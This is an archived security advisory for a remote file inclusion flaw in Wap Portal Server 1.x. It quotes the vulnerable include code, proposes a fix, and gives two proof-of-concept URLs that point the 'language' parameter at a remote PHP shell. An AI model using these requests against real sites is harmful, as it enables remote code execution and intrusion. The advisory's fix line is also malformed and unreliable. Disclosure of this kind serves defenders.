TUCoPS :: Web :: CMS / Portals :: c07-2220.htm

Wap Portal Serve 1.* <= Remote File Inclusion
Wap Portal Serve 1.* <= Remote File Inclusion
Wap Portal Serve 1.* <= Remote File Inclusion



+--------------------------------------------------------------------
+
+ Wap Portal Serve 1.* <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: Wap Portal Server
+ Venedor ...........: http://www.sakic.net 
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/ 
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code index.php:
+
+ .....
+ include("regglobals.php");
+ include("config.php");
+ include("lang/".$language);
+ 
+ .....
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $language ="user/dir" //Your language path
+
+--------------------------------------------------------------------
+ PoC:
+
+ http://[target]/index.php?language=http://phpshell 
+ http://[target]/admin/index.php?language=http://phpshell 
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH